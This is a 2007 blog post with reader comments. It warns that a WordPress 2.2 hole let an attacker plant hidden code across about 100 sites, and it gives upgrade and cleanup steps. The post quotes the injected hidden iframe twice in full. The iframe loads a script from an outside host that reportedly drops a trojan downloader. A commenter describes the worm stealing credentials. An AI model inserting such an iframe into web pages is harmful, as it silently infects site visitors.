Primarily covering topics about affiliate & search engine marketing, micro & mobile blogging, making money online, search engine ranking & optimization, social media & networking, software & technology, web development & graphic design, and anything else on my mind.
Random header image... Refresh for more!

Wordpress Version 2.2 Hack Warning

If you use self hosted Wordpress. I strongly recommend that you quickly visit www.wordpress.org and download the most recent version, Version 2.21.

Version 2.2 has a security hole and some hacker from Russia has gone into all of my sites (almost 100) and has installed this line of code:

<IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’></IFRAME>

This code activates a trojan downloader script:

If you have been affected by this. He is my suggested solution to deal with the problem:

  1. make a back up copy of your current theme, so you don’t lose any design modification work.
  2. Change your current theme to default.
  3. Install Wordpress. 2.2.1
  4. Overwrite all your files using the Wordpress. 2.2.1
  5. Additional upgrade instructions are provided at www.wordpress.org
  6. Once you have installed the update, the problem should be fixed.

You are now left with a blog running a clean copy of Wordpress. You are also left with a blog running the default theme. From there go back to your back up copy of your existing current theme and do a search for:

<IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’></IFRAME>

and simply remove that code from any file its found on.

From there you should be able to safely re-upload your existing current theme and activate it.

You are lucky if you don’t have close to 100 blogs like me… I will have to follow these steps 100 times. I guess my To-Do-List for the day has been revised! :)

Popularity: 3% [?]

14 comments

1 CyberCoder { 07.02.07 at 11:49 am }

Just a quick suggestion, when having to make wholesale changes, I typically do it this way.

1.) Download all files to local

2.) Search directory with Agent Ransack for text that needs replacing.

3.) Open each file in TextPad and replace the bad code with”" dynamically.

4.) Upload files back to server.

Using Textpad makes the process go much faster than manually editing the file.

IMHO

2 Garry Conn { 07.02.07 at 12:21 pm }

David,

Thanks for adding to this. I appreciate it.

So, what can you offer a blogger who has to do this with a million blogs affected! :)

lol…

Retire and get a day job! :)

3 Erin { 07.02.07 at 2:24 pm }

Sorry Garry that you have to do this (and everyone else affected)! I hope it will go quickly for you.

Erin

4 David Cooley { 07.02.07 at 2:37 pm }

Hey, you still managed to make a funny !!

“Retire and get a day job!”

Just remember their are people like me working a day job and trying to manage 50+ domains after hours ! ( that should cheer you up)

5 Garry Conn { 07.02.07 at 3:27 pm }

I am going to reserve myself until I get these problems corrected. In the mean time I have this site fixed, however my cpanel section for this site is still infected. I have Blog The Internet corrected and displaying ads that make money… so, at this point, I am updating and just doing a complete overwrite on all my aviation sites without doing back up… saving 50% of my time… at this point, I just need to get this malicious code off these sites as quickly as I can. I will not make money on these site after I overwrite my work becuase my adsense code will be removed… however, to me it is more important to wipe out my work, than to infect other people who can’t get infected without their knowledge.

I will report more about this later… I suggest everyone running Wordpress to update. I think Andy Beard even mentioned this in his comments the other day.. it was slightly off topic but it was there.

6 Garry Conn { 07.02.07 at 3:28 pm }

This isn’t the easist thing to do when you have a dot Com blog for just about every aircraft ever known to man running! :)

7 Garry Conn { 07.02.07 at 3:47 pm }

Oh here is some more humor… I have ran across a few blogs that mention that checking their make money online stats can be addictive… I tend to spend too much time checking my adsense stats too… but a day like today, I have no clue if I have made $1 dollar or $1000 LOL!!!

I do know with the loss of my aviation names, it will be down about 30% of my daily income… so it will be in my best interest to get the adsense code back up as quickly as possible! I won’t have time to use channels… I will install universal channel code and then go back and add channels to my individual sites… Aggghhhh… LOL

8 Goldy { 07.05.07 at 7:48 pm }

Sorry Garry. I hate crap like this.

9 Wordpress Hack Warning » SELaplana { 07.05.07 at 10:35 pm }

[...] can download the Wordpress 2.2.1 here. Visit Garry Conn’s post here also for more details and [...]

10 cooliojones { 07.06.07 at 5:26 am }

That is a big, big job. Sorry that happened to you Gary! We beat Russia before (Rocky IV), so I know we can do it again! Eye of the Tiger! :)

11   Wordpress Version 2.2 Hack Warning { 07.06.07 at 8:23 am }

[...] day or so who have spoke about Russian hackers trying to hack into older versions of Wordpress. Garry Conn had around 100 of his blogs hacked due to a security hole in Wordpress [...]

12 George { 07.06.07 at 10:48 am }

That stinks. I hope you can get it fixed it soon.

13 Garry Conn { 07.07.07 at 10:21 pm }

testing

14 Overhaul { 07.22.07 at 9:52 pm }

Hi, I also had a server attacked by this hacker’s worm that inserts :
… IFRAME name=’StatPage’ src=’http://www.555traff … into your files. It is very aggressive and goes after cPanel files, Horde webmail scripts, clientExec hosting management, phpBB files also. It will infect an entire server in a very short period of time. If this has happed to you and your received errors like:
… Cannot modify header information – headers already sent by (output started at /home ….
You should also notify your hosting provider and ask them to find and replace the intrusive line of code be in the .
My best guess is that the script on the hackers host is loading in the header of your pages and attempting to hijack a session and duplicating itself all over your server attempting to gather user and password info. If it finds a privileged user like root who knows what it can do.
Any ideas on how to pay back this hacker at 555traff dot org ???

Leave a Comment